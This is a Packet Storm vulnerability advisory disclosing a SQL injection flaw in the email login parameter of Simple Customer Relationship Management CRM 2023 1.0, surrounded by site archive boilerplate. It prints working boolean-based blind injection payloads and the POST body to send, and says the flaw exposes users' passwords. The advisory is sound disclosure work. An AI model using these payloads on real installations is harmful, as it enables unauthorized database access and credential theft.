exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

Simple Customer Relationship Management CRM 2023 1.0 SQL Injection
Posted May 29, 2023
Authored by nu11secur1ty

Simple Customer Relationship Management CRM 2023 version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 285e8f6ae7ee9b90299b635cefdb4e7b115a2a1bf605db59f2801bc204f4e67e

Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

Change Mirror Download
## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `email` parameter appears to be vulnerable to SQL injection
attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or
5206=5213-- were each submitted in the email parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all users and their passwords for access to the system.
Even if they are strongly encrypted this will get some time, but this
is not a problem for an attacker to decrypt if, if they are not enough
strongly encrypted.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)

## Time spend:
01:00:00


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close